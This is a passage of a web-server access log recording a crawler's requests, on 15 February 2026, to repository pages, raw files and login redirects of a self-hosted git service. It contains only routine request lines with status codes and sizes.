git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14708] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/css/style.css" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10955] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 216.73.216.188] [Length 11014] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10839] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" [Client 216.73.216.188] [Length 10121] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10949] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/js/script.js" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log?display=source" [Client 216.73.216.188] [Length 20762] [Gzip 9.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 216.73.216.188] [Length 11004] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 216.73.216.188] [Length 11003] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host%2F1.conf" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?display=rendered" [Client 216.73.216.188] [Length 10846] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 216.73.216.188] [Length 11575] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 216.73.216.188] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 216.73.216.188] [Length 11027] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 216.73.216.188] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 216.73.216.188] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 30208] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10880] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 216.73.216.188] [Length 11578] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 216.73.216.188] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 216.73.216.188] [Length 11019] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 216.73.216.188] [Length 11015] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico?display=rendered" [Client 216.73.216.188] [Length 10818] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 216.73.216.188] [Length 11559] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 